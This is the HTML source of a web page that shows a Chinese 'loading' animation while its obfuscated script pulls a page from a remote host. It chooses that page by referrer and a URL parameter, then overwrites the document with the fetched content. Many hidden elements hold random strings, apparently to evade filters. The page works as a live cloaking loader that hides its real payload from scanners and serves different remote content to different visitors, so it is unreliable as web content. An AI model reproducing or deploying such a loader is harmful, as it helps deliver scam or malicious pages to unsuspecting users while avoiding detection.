<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .jl9T0A9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .jl9T0A9 .l0bapOlh {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .jl9T0A9 .content {
            line-height: 50px;
            text-align: center
        }

        .jl9T0A9 .img {
            width: 100%
        }

        .jl9T0A9 .GZza1urqEkn {
            text-align: center
        }

        .jl9T0A9 .GZza1urqEkn span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .jl9T0A9 .GZza1urqEkn span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .jl9T0A9 .GZza1urqEkn span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .jl9T0A9 .GZza1urqEkn span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .jl9T0A9 .GZza1urqEkn span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .jl9T0A9 .GZza1urqEkn span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .jl9T0A9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yLehuV8f0I(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dayjsQj = yLehuV8f0I('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dayjsQj +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dayjsQj +".html?a=share";
		}
		
        VRRhmH=url+"#"+new Date().getTime();
        VRRhmH && function() {
            $.get(VRRhmH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >ttYNqXLFYiPYD6oI5jLZw4yiCy22BQvnT6QQpJhQu2QKUrvb1TifUwtHfKIiUBht1V0nfXcpkH7evZ5</ul>
<ul style='display:none' >ttYNqXLFYiPYD6oI5jLZw4yiCy22BQvnT6QQpJhQu2QKUrvb1TifUwtHfKIiUBht1V0nfXcpkH7evZ5</ul>
<div style='display:none'>YJrPgM4sVcxAscX0UVS4HgLWyoIeFtNUbgT9TJjW</div>
<ul style='display:none' >ttYNqXLFYiPYD6oI5jLZw4yiCy22BQvnT6QQpJhQu2QKUrvb1TifUwtHfKIiUBht1V0nfXcpkH7evZ5</ul>
<div style='display:none'>YJrPgM4sVcxAscX0UVS4HgLWyoIeFtNUbgT9TJjW</div>
<a  href='#' style='display:none'>FRLh341HF4ekWetY7YxxJgK4Vh0ZiPqoWmKMb3oGyoYwlxXpYnC4Llz5eAYG91qF1OIjOvjgHzqqSRw4YTqFj</a>
<div style='display:none'>YJrPgM4sVcxAscX0UVS4HgLWyoIeFtNUbgT9TJjW</div><div class="jl9T0A9">
    <div class="l0bapOlh">
        <div class="GZza1urqEkn">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >cScXMq8nTFCIFYXjIs3lTZrtWt8o1agIlD1zjSoaoGTbYQWCtgmRHb9vB4SV0rbnX3KHMcnxW</ul>
<span style='display:none'>zY8BWS7OLH9LgRrt0iLmmhdDyE6DKl</span>
<ul style='display:none' >cScXMq8nTFCIFYXjIs3lTZrtWt8o1agIlD1zjSoaoGTbYQWCtgmRHb9vB4SV0rbnX3KHMcnxW</ul>
<b style='display:none' >hXM7wGsdAI9hoqKby64TmV5sTyUVs1DU4w2pnuYeaDWqB8OMg7pd06</b>
<div style='display:none'>G2F0ryOysFsNjJCoB4TTAu8WCqrm0FUzfU617IP0jlDodAteGgC6K3XB</div>
<div style='display:none'>G2F0ryOysFsNjJCoB4TTAu8WCqrm0FUzfU617IP0jlDodAteGgC6K3XB</div>
<ul style='display:none' >cScXMq8nTFCIFYXjIs3lTZrtWt8o1agIlD1zjSoaoGTbYQWCtgmRHb9vB4SV0rbnX3KHMcnxW</ul>
<a  href='#' style='display:none'>W4mPYx9lJSJE2QcY0nlPnpxf599H6TTsQIK9Ag8QZEuITABrG1MmPOE3O8IyGdc</a>
<span style='display:none'>zY8BWS7OLH9LgRrt0iLmmhdDyE6DKl</span>
<li style='display:none' >iTtnHiLzr8t5yeFkaB2DlxypLUtoW</li></body>
</html>